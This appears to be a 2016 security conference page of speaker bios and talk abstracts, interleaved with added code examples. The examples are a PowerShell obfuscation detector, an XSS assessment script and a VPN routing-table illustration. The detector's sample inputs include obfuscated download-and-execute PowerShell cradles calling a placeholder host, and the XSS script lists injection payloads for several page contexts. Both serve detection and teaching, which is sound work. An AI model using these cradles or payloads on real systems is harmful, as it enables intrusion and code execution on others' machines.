Anna Piperal
Head of the e-Estonia Showroom at Enterprise Estonia. Her areas of expertise include e-government, ICT, cyber security, branding and marketing. Since September 2015 she has headed the e-Estonia Showroom, presenting e-Estonia to visitors from more than 120 countries.
Keynote (tentative title): On the digital society e-Estonia
TBA
Oct. 20 (Thu) - 21 (Fri), 2016
Karsten Nohl has spoken widely on security gaps since 2006. He and co-investigators have uncovered flaws in mobile communication, payment, and other widely-used infrastructures. In his work at an Asian 4G and digital services provider, and as Chief Scientist at Security Research Labs in Berlin, a risk management think tank specializing in emerging IT threats, Karsten challenges security assumptions in proprietary systems and is fascinated by the security-innovation trade-off. Hailing from the Rhineland, he studied electrical engineering in Heidelberg and earned a doctorate in 2008 from the University of Virginia.
Based on one decade of impactful security research and several years as a risk manager, Karsten Nohl reflects upon what he would have done differently in pushing a data security agenda.
Our community is convinced that stellar IT security is paramount for companies large and small: We need security for system availability, for brand reputation, to prevent fraud, and to keep data private. But is more security always better?
Poorly chosen protection measures can have large externalities on the productivity, innovation capacity, and even happiness of organizations. Can too much security be worse than too little security?
This talk investigates the trade-off between security and innovation along several examples of current security research. It finds that some hacking research is counter-productive in bringing the most security to most people, by spreading fear too widely.
Amihai Neiderman is a security researcher in the field of vulnerability research. Amihai has worked on everything from embedded devices and IoT to OS exploitation and web security. In past years he worked as an independent researcher for various companies and now works as head of research at Equus Technologies, Israel, a company that specializes in mobile security.
DVB-T is a standard for digital television broadcasting. The standard requires a consumer who wants to watch digital television broadcasts to purchase a special device that can receive and process the RF signals.
In my research I wanted to exploit a DVB-T receiver via an over-the-air attack: sending a specially crafted data packet over an RF signal and taking over the device.
The research focused on a common receiver in Israel and Europe made by a Chinese company called MSTAR. In the talk I will cover the research steps, from extracting the firmware from the flash chip to developing an ad-hoc debugger and finally exploiting the device.
Andrés Riancho is an application security expert who currently leads the community-driven, open source w3af project and provides in-depth web application penetration testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3Com and ISS, contributed to SAP research performed at one of his former employers, and reported vulnerabilities in hundreds of web applications.
His main focus has always been the web application security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and held trainings at many security conferences around the globe, such as BlackHat (USA and Europe), SEC-T (Sweden), DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland), CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada), PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated web application vulnerability detection and exploitation.
TBA
Dai Shimogaito (下垣内 太)
Born in Toyokawa, Aichi Prefecture
Graduated from the Faculty of Informatics, Kansai University (1998)
President and CEO, Osaka Data Recovery Co., Ltd. http://www.daillo.com/
Works daily on recovering data from failed hard disk drives and analyzing damaged digital data, while developing high-integrity data recovery (HiDR) techniques and researching technical countermeasures against the cyber-security risk of PARADAIS. Also performs forensic investigation and analysis of digital evidence in murder, fraud and other cases at the request of police and other law-enforcement agencies and of lawyers.
Recent major talks
2014: CODE BLUE; lecture at the 11th general meeting of the NPO Institute of Digital Forensics
2015: Maccha139 study group; Hyogo Prefectural Police Headquarters Cybercrime Investigation Study Group; LAC Co., Ltd. study group
2016: Mie Prefectural Police Headquarters, Community Safety Department, Cybercrime Countermeasures Division; HTCIA International Conference & Training Expo (USA). In addition to the above, more than ten closed conferences, technical lectures and similar.
Hard disk drives (HDDs) have hidden space for storing data. If malicious software is stored in this hidden area, it could be used to attack computers even if they are air-gapped.
By abusing the surplus space of an HDD, such a cyber attack against offline industrial control systems could become possible.
Moreover, software or any data in this hidden space can survive formatting, OS reinstallation, malware-destruction software and any conventional cybersecurity framework.
Let us call it "PARADAIS".
While PARADAIS stays unactivated, no LBAs are mapped to the hidden data area. Therefore, even if the HDD is wiped several times, such as 3-pass, 7-pass or 35-pass, it remains there as it is.
There has been no way to detect or erase the unidentified software in PARADAIS in advance when the HDD was modified prior to your purchase or its installation. However, new solutions are being discovered by my ongoing research.
Who would predict that Windows may boot after the HDD has been wiped by Enhanced Secure Erase? You would, at CODE BLUE 2016.
The second part of my presentation will be on DATA RECOVERY from HDDs whose platter surface has been damaged by a head crash, a natural disaster or intentional destruction at a crime scene. Survey results from 12 cases show how effective disk surface cleaning by DDRH was.
Daniel Bohannon is an Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques. As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breaches occur. He also develops new methods for detecting malicious PowerShell usage at both the host and network level while researching obfuscation techniques for PowerShell-based attacks that are being used by numerous threat groups. Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization's incident response team. Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
The very best attackers often use PowerShell to hide their scripts from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs.
We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
Updated PowerShell event logging mitigates many of the detection challenges that obfuscation introduces. However, many organizations do not enable this PowerShell logging. Therefore, I will provide techniques that the Blue Team can use to detect the presence of these obfuscation methods in command line arguments. I will conclude this talk by highlighting the public release of Invoke-Obfuscation. This tool applies the aforementioned obfuscation techniques to user-provided commands and scripts to evade command line argument detection mechanisms.
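The Blue-Team side of the abstract, as an added example that is not part of the talk and not code from Invoke-Obfuscation: a scorer for the CommandLine field of process-creation events that first decodes -EncodedCommand (UTF-16LE, base64) so indicators run against what PowerShell will actually execute, then counts syntactic tricks that plain scripts rarely need on a command line (backtick escapes, string concatenation, -join, [char] casts, the call operator on a string, the -f format operator) and tokens whose letters flip case far more often than PascalCase cmdlet names. The sample command lines, the indicator weights and the threshold are constructed for the illustration.

```python
import base64
import re

# Constructed sample command lines, standing in for the CommandLine field of
# process-creation events (Sysmon Event ID 1 / Windows Security 4688). They are
# illustrative, not samples from the talk or output of Invoke-Obfuscation.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"


def encode_command(script):
    """Build a -EncodedCommand argument the way PowerShell expects it:
    UTF-16LE text, base64 encoded."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


SAMPLE_COMMAND_LINES = [
    # plain, benign
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    # encoded: hides keywords from naive matching, but is trivially decodable
    "powershell.exe -NoP -W Hidden -Enc " + encode_command(PAYLOAD),
    # string concatenation plus the call operator to hide the cmdlet name
    "powershell.exe -c \"&('I'+'EX')(('Ne'+'w-Ob'+'ject') -join '')\"",
    # backtick escapes and random casing inside tokens
    "powershell.exe \"i`e`x (nEw-oBjEcT nEt.wEbClIeNt).dOwNlOaDsTrInG('http://example.invalid/a')\"",
    # [char] casts assembling a cmdlet name at run time
    "powershell.exe \"([char]73+[char]69+[char]88)\"",
]

# -EncodedCommand and the unambiguous prefixes PowerShell accepts for it,
# followed by the base64 blob.
ENCODED_RE = re.compile(
    r"(?<![\w-])-(?:encodedcommand|encoded|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)

# Syntactic tricks that legitimate scripts almost never need on a command line.
INDICATORS = {
    "backtick_escape": (re.compile(r"`[A-Za-z]"), 2),                      # i`e`x
    "string_concat": (re.compile(r"['\"]\s*\+\s*['\"]"), 2),              # 'I'+'EX'
    "join_operator": (re.compile(r"-join\b", re.IGNORECASE), 1),
    "char_cast": (re.compile(r"\[char\]\s*\d+", re.IGNORECASE), 2),       # [char]73
    "call_operator": (re.compile(r"&\s*\(?\s*['\"(]"), 2),                # &('I'+'EX')
    "format_operator": (re.compile(r"['\"]\s*-f\s", re.IGNORECASE), 2),   # "{0}{1}" -f
}


def decode_base64_utf16(blob):
    """Decode an -EncodedCommand argument, or return None if it is not one."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def mixed_case_tokens(text, min_letters=6, ratio=0.6):
    """Count identifier-like tokens whose letters flip case far more often than
    PascalCase names do (Net.WebClient flips 5 of 11 times; nEw-oBjEcT 7 of 8)."""
    count = 0
    for tok in re.findall(r"[A-Za-z][A-Za-z.-]{3,}", text):
        letters = [c for c in tok if c.isalpha()]
        if len(letters) < min_letters:
            continue
        flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
        if flips / (len(letters) - 1) > ratio:
            count += 1
    return count


def analyze(cmdline):
    """Score one command line. Encoded commands are decoded first so the
    indicators run against what PowerShell will actually execute."""
    decoded = None
    text = cmdline
    m = ENCODED_RE.search(cmdline)
    if m:
        decoded = decode_base64_utf16(m.group(1))
        if decoded is not None:
            text = cmdline[: m.start(1)] + decoded + cmdline[m.end(1):]
    hits = {}
    score = 0
    for name, (pattern, weight) in INDICATORS.items():
        n = len(pattern.findall(text))
        if n:
            hits[name] = n
            score += weight * n
    mixed = mixed_case_tokens(text)
    if mixed:
        hits["mixed_case_tokens"] = mixed
        score += 2 * mixed
    return {"encoded": decoded is not None, "decoded": decoded,
            "hits": hits, "score": score, "obfuscated": score >= 3}


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = analyze(line)
        print(f"score={r['score']:2d} obfuscated={r['obfuscated']!s:5} encoded={r['encoded']!s:5} {r['hits']}")
```

Encoding alone is reported but not scored: the decoded command in the second sample is ordinary PowerShell, and it is the decoded text, not the base64 wrapper, that keyword rules should see. The remaining three samples each trip a different indicator, which is the point of scoring several independent tricks rather than matching one signature.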
Degree in Computer Science from Fumec University; Security Analyst and Researcher at Epam Systems. Certified by Offensive Security (OSCP) and eLearn (WPT) as a pentester, Ewerson has published articles in the Brazilian information security and computer magazines H4ck3r and GEEK, and has posted exploits and advisories on SecurityFocus for vulnerabilities found in large companies such as IBM, McAfee, Skype, Technicolor, Tufin, TrendMicro and others. He contributed to the development of several modules for the Metasploit Framework project. Founder of the BHack Conference and of Area31, the first hackerspace in Minas Gerais, and an active Kali Linux community contributor.
For quite some time we have been seeing espionage cases reaching countries, governments and large companies.
A large number of backdoors have been found in network devices, mobile phones and other related devices, the main cases being those reported by the media, involving TP-Link, D-Link, Linksys, Samsung and other internationally renowned companies.
This talk will discuss a backdoor found in the modem / router rtn, equipment with a big question mark over it: there is no vendor identification and no information about who its manufacturer is, at least 7 companies are linked to its production, sales and distribution in the market, and some of them never really existed.
Which leads us to the question in the research title: "Who put the backdoor in my modem?"
Chen-yu Dai [GD]
Chen-yu Dai (GD) is CTO at Team T5 Research, providing Digital Forensics & Incident Response services, developing a Threat Intelligence Program and Platforms, and consulting on enterprise cyber defenses.
He is studying at the graduate school of Department of Information Management in the National Taiwan University of Science and Technology.
He also volunteered as deputy coordinator of HITCON, the largest hacker community and security conference in Taiwan.
He has received many prizes from domestic and international CTFs, as well as bug bounty programs.
Shi-Cho Cha [CSC]
Shi-Cho Cha (CSC) is currently an associate professor in the Department of Information Management at the National Taiwan University of Science and Technology, where he has been a faculty member since 2006. He received his B.S. and Ph.D. in Information Management from the National Taiwan University in 1996 and 2003. He is a certified PMP, CISSP, CCFP and CISM. From 2000 to 2003 he was a senior consultant at eLand Technologies and acted as project leader in developing several e-marketing systems. From 2003 to 2006 he was a manager at PricewaterhouseCoopers, Taiwan, and helped several major government agencies develop their information security management systems.
Recently he helped NTUST establish a security analysis workforce and helped several organizations evaluate their system security. His current research interests are in the areas of information security management, identity management, smartphone security and IoT security.
Smartphones are commonly used as the controller and Internet gateway for BLE-enabled IoT devices. Designing a strong authentication protocol between them is a key part of IoT security. However, mobile app design faces many challenges, such as limited input and output interfaces as well as user privacy protection features. Because of these restrictions, many vendors have given up on BLE's built-in Security Manager Protocol and chosen to build their own authentication protocols.
This study focuses on a generalized method for analyzing these BLE authentication protocols, discovering and solving the challenges mentioned above. We applied this method to commercial products, including the popular Gogoro Smart Scooter from Taiwan. We will demonstrate that, under certain circumstances, it is possible to dump the key used to unlock your Gogoro Scooter and to send fake BLE authentication protocol packets to steal the scooter.
Ido Naor
Ido is a senior security researcher at the Global Research & Analysis Team (GReAT), Kaspersky Lab. He joined Kaspersky two years ago and is leading the regional research in Israel.
Ido specializes in malware analysis, penetration testing and software reverse engineering and has been credited for his work by major enterprises such as: Google, Facebook, Linkedin, Alibaba and more.
Aside from research, Ido is a martial arts expert and a father of two daughters.
Dani Goland
Dani is the CEO and founder of Undot, an Israel-based startup that developed a unified remote-control application to control home appliances.
Dani has more than a decade of experience in programming on a variety of frameworks and languages.
Aside from managing Undot, Dani is a frequent competitor in Hackathons (programming competitions) and won 1st places at HackTrackTLV 2016 and eBay Hackathon 2015.
In June, thousands of Facebook users complained that they had been infected by a virus through their accounts after receiving a message from a Facebook friend claiming that they had been mentioned in a comment. Kaspersky Lab researcher Ido Naor and Dani Goland, CEO and founder of Undot, decided to investigate. They quickly discovered that the message had in fact been initiated by attackers and unleashed a two-stage attack on recipients. The first stage started when the user clicked on the "mention". A malicious file seized control of their browser, terminating its legitimate session and replacing it with a malicious one that captured their entire web traffic. The second stage included a highly sophisticated script that took over the victims' Facebook and Google Drive accounts. After puzzling out the script, they managed to extract the proverbial needle from the haystack: an unknown Facebook vulnerability that allowed an attacker to exploit the notifications functionality.
In this talk, Dani and Ido will dive into the bits and bytes of the campaign and explain how the attackers exploited Facebook to spread the malware.
Inhyuk Seo
My name is Inhyuk Seo (nick: inhack). I received a B.S. in Computer Science and Engineering from Hanyang University (ERICA) in 2015. Now I am a researcher and M.S. student at the SANE (Security Analysis aNd Evaluation) Lab at Korea University. I am interested in programming languages, software testing, machine learning and artificial intelligence.
In 2012 I completed the high-quality information security education course "Best of the Best (BoB)" hosted by KITRI (Korea Information Technology Research Institute) and carried out the "Exploit Decoder for Obfuscated JavaScript" project.
I have participated in many projects related to vulnerability analysis. I carried out "Smart TV Vulnerability Analysis and Security Evaluation" and "Developing a Mobile Security Solution (EAL4) for a Military Environment". I also participated in a vulnerability analysis project for the IoT products of various domestic telecommunications companies.
Jisoo Park
Jisoo Park graduated from Dongguk University with a B.S. in Computer Science and Engineering. He participated in a secure coding research project in the Programming Language Lab and at KISA (Korea Internet & Security Agency). He worked as a software QA tester at the anti-virus company AhnLab. He also completed the high-quality information security education course "Best of the Best" hosted by KITRI (Korea Information Technology Research Institute) and conducted security consulting for a car-sharing service company.
Jisoo Park is now an M.S. course researcher at the Security Analysis aNd Evaluation Lab (led by Prof. Seungjoo Gabriel Kim, who was a speaker at CODE BLUE 2015), Graduate School of Information Security, Korea University. Recently he participated in the IT Security Certification Center's research project on foreign security evaluation policy and technique trends, and took part in the CCUF (CC User Forum) and ICCC (International Common Criteria Conference) 2015 held in the United Kingdom. He is interested in assurance of IT systems, threat and risk modeling, and Common Criteria.
End users' requirements for secure IT products keep increasing in environments that directly affect human life and industry, such as IoT and CPS. Because vendors and end users sell or buy products on the basis of trustworthy, objective security evaluation results, the role of security evaluation is important. Security evaluations fall into two parts: evaluation at the design level, such as ISO/IEC 29128 (Verification of Cryptographic Protocols), and evaluation at the post-implementation level, such as ISO/IEC 15408 (Common Criteria). Both of these standards, ISO/IEC 29128 and ISO/IEC 15408, advise the use of formal verification and automated tools when a high assurance level is required for the target product.
For a long time, vulnerability detection using automated tools has been attempted and studied by many security researchers and hackers, and recently the study of automated vulnerability detection has become more active than ever in the hacking community with DARPA's Cyber Grand Challenge (CGC). But too many tools are being developed continually, and each tool usually has its own purpose, so it is hard to achieve the ultimate goal of security evaluation effectively and to verify evaluation results.
Furthermore, there are no references for categorizing automated tools from the perspective of security evaluation. So in this presentation we will list, categorize and analyze the automated tools for vulnerability detection and present our results: pros and cons, purpose, effectiveness, and so on.
Isaac Dawson is a Principal Security Researcher at Veracode, Inc. where he leads the R&D efforts of Veracode's dynamic analysis offerings. Prior to Veracode, he was a consultant for @stake and then Symantec. In 2004 he moved to Japan to start their application security consulting team.
After leaving for Veracode, he decided Japan was just too comfortable and has stayed ever since.
An avid Go programmer, he has an interest in distributed systems and, in particular, scanning the web.
Building a distributed scanner can be challenging, building one using real browsers even more so.
Injecting JavaScript to extract JS libraries and their versions, storing all HTML and JavaScript along with security headers requires a unique architecture. Having scanned the top 1,000,000 sites, I will cover the challenges I overcame in designing a scalable system to fingerprint the current state of the web. I will also present some of the more interesting findings of the data that was analyzed.
Web security engineer at Mitsui Bussan Secure Directions, Inc. CISSP.
For about seven years he has worked on finding vulnerabilities in web applications (web application assessment) and has found many of them. Recently he has wanted to find even more, but feels that human-driven web application assessment is limited by available resources. He therefore turned to machine learning, whose industrial use has been accelerating in recent years, and is researching and developing SAIVS, an AI intended to perform web application assessment in place of a human. In the near future he hopes, in all seriousness, that SAIVS will do the assessments for him. SAIVS was shown at Black Hat Asia 2016 Arsenal in Singapore, where it was well received.
Japan faces a shortage of information security personnel. As one way of addressing this shortage, I have focused on artificial intelligence (AI) technology and am researching and developing SAIVS (Spider Artificial Intelligence Vulnerability Scanner), an AI that finds web application vulnerabilities on its own initiative. The ultimate goal of SAIVS is to reach an assessment capability equal to or better than that of a human assessor. The current SAIVS is a prototype, but it can already find web application vulnerabilities while behaving in the human-like ways below.
1. Crawling the web application
SAIVS can crawl dynamic pages such as login and account-registration pages in the same way a human would. For a web application that requires login, for example, it first creates an account on the registration page and then logs in. When creating the account it interprets the meaning of each input field (name, e-mail, password and so on) and enters a string appropriate to the field. If an error occurs because of an invalid input, it interprets the meaning of the error and enters a different string that avoids it.
2. Detecting vulnerabilities
SAIVS observes the behaviour of the web application and finds vulnerabilities efficiently with a small number of requests. For reflected XSS, for example, it recognizes where the input is echoed back and injects an exploitable tag or script appropriate to the HTML or JavaScript context. If the input is sanitized, it decides on its own which test pattern evades the sanitization and tests again.
These behaviours are achieved by using several machine learning algorithms to simulate the thought patterns a vulnerability assessor follows when finding vulnerabilities.
This presentation explains the techniques that make SAIVS possible and demonstrates it finding a vulnerability (reflected XSS) while crawling a test site.
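The decision process in item 2, as an added example that is not SAIVS code: it uses no machine learning and writes the assessor's rules by hand, to make concrete what the learned behaviour has to reproduce. A metacharacter-free canary is sent first to find where the input is echoed and in which context (HTML text, quoted or unquoted attribute, JavaScript string or bare code); a context-specific payload is then sent, and only if it comes back altered is the next candidate for that context tried. It goes beyond the abstract's single example by handling several contexts. The target apps are constructed stand-ins that return the HTML a server would.

```python
import html
import re

# A marker with no HTML metacharacters, so the first probe reveals only
# where and in what context the input is echoed.
CANARY = "zqx7Canary9"

# Payloads per reflection context, tried in order. A later one is attempted
# only when the earlier one came back altered (sanitized). Chosen by hand here;
# SAIVS learns this choice.
PAYLOADS = {
    "html_text":     ["<svg onload=alert(1)>", "<img src=x onerror=alert(1)>"],
    'attr_"':        ['"><svg onload=alert(1)>', '" onfocus=alert(1) autofocus="'],
    "attr_'":        ["'><svg onload=alert(1)>", "' onfocus=alert(1) autofocus='"],
    "attr_unquoted": [" onfocus=alert(1) autofocus x="],
    "js_string_'":   ["';alert(1);//", "</script><svg onload=alert(1)>"],
    'js_string_"':   ['";alert(1);//', "</script><svg onload=alert(1)>"],
    "js_code":       ["alert(1)"],
}


def _open_quote(segment):
    """Quote character left unclosed in segment (the one we must break out of)."""
    if segment.count('"') % 2:
        return '"'
    if segment.count("'") % 2:
        return "'"
    return None


def find_contexts(body, canary):
    """Classify every reflection of canary: HTML text, inside a tag's quoted or
    unquoted attribute, or inside a <script> block (quoted string or bare code)."""
    contexts = []
    lower = body.lower()
    for m in re.finditer(re.escape(canary), body):
        pos = m.start()
        script_open = lower.rfind("<script", 0, pos)
        if script_open > lower.rfind("</script", 0, pos):
            q = _open_quote(body[script_open:pos])
            ctx = f"js_string_{q}" if q else "js_code"
        elif body.rfind("<", 0, pos) > body.rfind(">", 0, pos):
            q = _open_quote(body[body.rfind("<", 0, pos):pos])
            ctx = f"attr_{q}" if q else "attr_unquoted"
        else:
            ctx = "html_text"
        if ctx not in contexts:
            contexts.append(ctx)
    return contexts


def assess(app):
    """app(value) returns the response body for one request carrying value in
    the tested parameter. Returns (context, payload) pairs that came back verbatim."""
    findings = []
    for ctx in find_contexts(app(CANARY), CANARY):
        for payload in PAYLOADS.get(ctx, []):
            if payload in app(payload):   # echoed unmodified: exploitable here
                findings.append((ctx, payload))
                break                     # first working payload is enough
    return findings


# Constructed stand-ins for a target site, each echoing the parameter differently.
def app_attr_unescaped(q):
    return f'<html><body><input type="text" name="q" value="{q}"></body></html>'


def app_text_escaped(q):
    return f"<html><body><p>Results for {html.escape(q)}</p></body></html>"


def app_attr_angle_stripped(q):
    stripped = q.replace("<", "").replace(">", "")   # blocks tags, not attributes
    return f'<input name="q" value="{stripped}">'


def app_js_string(q):
    safe = q.replace("</", "<\\/")                     # blocks </script> only
    return f"<script>var q = '{safe}';</script>"


if __name__ == "__main__":
    for app in (app_attr_unescaped, app_text_escaped, app_attr_angle_stripped, app_js_string):
        print(app.__name__, assess(app))
```

The third stand-in is the "sanitized" case from the abstract: angle brackets are removed, so the tag-based payload fails and the scanner falls back to an event-handler payload that needs no tag at all. Each target costs two or three requests instead of a blind list of hundreds.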
Jason Donenfeld is an independent security researcher and software developer, with a broad background of experience, well-known in both the security community and the open source world, and has pioneered several exploitation techniques. He has worked with many severe vulnerabilities in widespread software projects, including working on 0-day vulnerabilities in the Linux kernel, as well as extensive hardware reverse engineering. His security work spans advanced mathematical and geometric algorithms, cryptography, and remote exploitation.
Jason founded Edge Security (www.edgesecurity.com), a highly capable security consulting firm, with expertise in vulnerability discovery, security assessments, reverse engineering, hardened development, and physical security.
The state of VPN protocols is not pretty, with popular options, such as IPsec and OpenVPN, being overwhelmingly complex, with large attack surfaces, using mostly cryptographic designs from the 90s. WireGuard presents a new abuse-resistant and high-performance alternative based on modern cryptography, with a focus on implementation and usability simplicity. It uses a 1-RTT handshake, based on NoiseIK, to provide perfect forward secrecy, identity hiding, and resistance to key-compromise impersonation attacks, among other important security properties, as well as high performance transport using ChaCha20Poly1305. A novel IP-binding cookie MAC mechanism is used to protect against several forms of common denial-of-service attacks, both against the client and server, improving greatly on those of DTLS and IKEv2. Key distribution is handled out-of-band with extremely short Curve25519 points, which can be passed around in the likes of OpenSSH. Discarding the academic layering perfection of IPsec, WireGuard introduces the idea of a "cryptokey routing table", alongside an extremely simple and fully defined timer-state mechanism, to allow for easy and minimal configuration; WireGuard is actually securely deployable in practical settings. In order to rival the performance of IPsec, WireGuard is implemented inside the Linux kernel, but unlike IPsec, it is implemented in less than 4,000 lines of code, making the implementation manageably auditable. The talk will examine both the cryptography and kernel implementation particulars of WireGuard and explore an offensive attack perspective on network tunnels.
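The "cryptokey routing table" idea from the abstract, as an added illustration that is not WireGuard's code: one table maps AllowedIPs prefixes to peer public keys and is consulted in both directions. Outbound, the destination address selects the key a packet is encrypted to (no owner, no transmission). Inbound, after a packet has decrypted under some peer's key, the inner source address must map back to that same peer, so a peer cannot spoof addresses it was not assigned. The keys below are placeholder strings, and the table is a list sorted by prefix length rather than the trie WireGuard uses; the peer configuration is constructed for the example.

```python
import ipaddress

# Constructed peer table. Public keys are placeholder strings standing in for
# Curve25519 points; AllowedIPs are what each peer may source (inbound) and
# what is encrypted to it (outbound).
PEERS = {
    "PEER_A_PUBKEY": ["10.0.0.2/32", "192.168.50.0/24", "fd00::2/128"],
    "PEER_B_PUBKEY": ["10.0.0.3/32"],
    "PEER_C_PUBKEY": ["0.0.0.0/0"],          # default route, e.g. a gateway peer
}


class CryptokeyRoutingTable:
    """One table, consulted in both directions. Simplification of WireGuard's
    cryptokey routing: a sorted list instead of a trie, and an address prefix
    is assumed to be listed for exactly one peer."""

    def __init__(self, peers):
        self.routes = []
        for pubkey, cidrs in peers.items():
            for cidr in cidrs:
                self.routes.append((ipaddress.ip_network(cidr), pubkey))
        # Longest prefix first, so the first match is the most specific one.
        self.routes.sort(key=lambda r: r[0].prefixlen, reverse=True)

    def lookup(self, ip):
        """Peer that owns ip under longest-prefix match, or None."""
        addr = ipaddress.ip_address(ip)
        for net, pubkey in self.routes:
            if net.version == addr.version and addr in net:
                return pubkey
        return None

    def outbound_peer(self, dst_ip):
        """A packet to dst_ip is encrypted with the key of the owning peer;
        with no owner it is dropped rather than sent anywhere."""
        return self.lookup(dst_ip)

    def accept_inbound(self, sender_pubkey, inner_src_ip):
        """After decryption succeeded under sender's key, the inner source
        address must map back to that same peer; anything else is dropped."""
        return self.lookup(inner_src_ip) == sender_pubkey


if __name__ == "__main__":
    table = CryptokeyRoutingTable(PEERS)
    # Constructed traffic: outbound destinations and inbound (sender, inner src) pairs.
    for dst in ("10.0.0.2", "192.168.50.7", "93.184.216.34", "fd00::9"):
        print("to", dst, "->", table.outbound_peer(dst))
    for sender, src in (("PEER_A_PUBKEY", "10.0.0.2"),
                        ("PEER_B_PUBKEY", "10.0.0.2"),     # B spoofing A's address
                        ("PEER_C_PUBKEY", "10.0.0.2")):    # gateway spoofing A's address
        print("from", sender, "claiming", src, "->", "accept" if table.accept_inbound(sender, src) else "drop")
```

The last inbound case shows why the inbound check is a lookup rather than a subnet test: the gateway peer's 0.0.0.0/0 does contain 10.0.0.2, but the longest-prefix owner of that address is peer A, so a packet from the gateway claiming to be A is dropped.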
Jonathan Levin is the founder and CTO of Technologeeks, a group of experts devoted to tackling the toughest problems and most challenging technologies in software today. Focusing on operating system internals and networking, we aim to deliver expert solutions for the Big Three (Windows, Linux and Mac OS), and the leading mobile derivatives - Android and iOS. Jonathan is the author of "Android Internals" and "Mac OS X and iOS Internals", the two definitive works on the inner workings of today's mobile operating systems.
iOS was the first to introduce Kernel Patch Protection (KPP), a mechanism meant to mitigate tampering with kernel code. Samsung followed suit with TIMA/KRP. Both of these, however, remain undocumented to this day.
With Apple's recent relaxation of iOS encryption, a rare first glance has been provided into the workings of KPP. At last, it can be compared and contrasted with Samsung's implementation.
This talk will present the theoretical aspects (TrustZone, ARM ELx and the secure monitor), and then discuss the two implementations, Apple's and Samsung's, side by side. Full examples with decompilation (using the author's free tools) will be provided.
Advanced Technology Research Laboratory and Security Response Team, SecureBrain Corporation
Senior Software Engineer
Joined SecureBrain Corporation in 2014.
Works on software development as a software engineer while also conducting security research.
Mainly responsible for analyzing cybercrime involving banking malware and phishing, and for developing countermeasure technologies.
Main talks and presentations
Instructor, Anti-Phishing Guidelines practical seminars, 2015 and 2016
2016 IEICE invited symposium, "Analysis techniques and observation results from long-term malware observation and taint analysis"
Losses from fraudulent transfers involving internet banking have risen sharply since 2013 and have become a social problem.
In April 2015 the Tokyo Metropolitan Police Department carried out "Operation Netbanking Virus Neutralization", the first takedown operation conducted by Japan on its own.
At the request of the Tokyo Metropolitan Police Department, we developed a technique to neutralize VAWTRAK, the target of the operation, and provided technical cooperation.
This presentation gives an overview of the neutralization operation and of how the technical cooperation came about.
It also introduces, with demonstrations, the technique we developed to neutralize VAWTRAK.
Finally, based on our survey of the banking malware prevalent in 2016, it describes how attacks have become more sophisticated.
Mingyen Hsieh
Mingyen Hsieh is a threat researcher with Trend Micro.
He is also an enthusiast in APT investigation, threat intelligence, reverse engineering and sandboxing.
His current goal is to dig up more quality intelligence and to develop an efficient intelligence processing system for the team.
Joey Chen
Joey Chen is currently working as a threat researcher with Trend Micro. His major areas of research include APT investigation, reverse engineering and cryptography.
His current goal is to dig up more quality intelligence and to develop decryption tools that help him and his team get more sleep at night.
TBA
Moony Li
7 years of security product development.
R&D leader of the Sandcastle core engine in the Deep Discovery (DD) product for gateway 0-day exploit detection.
Currently focusing on research into Mac/Windows kernel vulnerabilities and exploits.
Staff Developer, Trend Micro Inc.
Jack Tang
10 years of anti-malware solution development.
Familiar with Windows/Mac kernel technology and browser and document exploits.
Currently focusing on research into Mac vulnerabilities and exploits.
Senior Staff Developer, Trend Micro Inc.
Rank 35 in the Microsoft Security Response Center (MSRC) Bounty Program Top 100 list in 2015
Rank 16 in the Microsoft Security Response Center (MSRC) Bounty Program Top 100 list in 2016
Research into OS X security vulnerabilities has been gaining popularity as Mac devices become more popular. The OS X IOKit exposes a large attack surface for compromising kernel extensions, and the kernel itself, from user mode. Many researchers work in this domain (see the Reference section). We will share some research results in this domain:
1. A passive fuzzing framework with context enlightenment for hunting kernel vulnerabilities.
2. Exploit tricks for occupying kernel memory from a user-mode program in order to bypass SMAP & SMEP.
3. Using the vulnerabilities found by our fuzzing method, together with the new exploit trick, to root OS X successfully, twice.
We introduce a new method, "Passive Fuzzing And Context Enlightenment for OSX IOKit", named PFACE. PFACE has the following highlights. Firstly, it can satisfy condition dependencies and let execution go deeper and wider, so that more code is hit and more system crashes are obtained. Secondly, it can output the modules that contain "Contexts", which are indicators of suspicious vulnerabilities; these indicators lead the reviewer to review those modules first.
If you have a bunch of kernel vulnerabilities, the big problem is how to transfer your ROP gadgets into kernel space from a user-mode program, because recent OS X already enables SMAP and SMEP. The well-known security researcher Stefan Esser proposed OSData as a good structure for occupying kernel memory [Reference section 5]. Yes, OSData is a good data structure, but in practice there are some problems that stop OSData from working. We found a new method that makes OSData work for occupying kernel memory from a user-mode program. We used this method to exploit the vulnerabilities we found and rooted OS X (10.11.3) successfully.
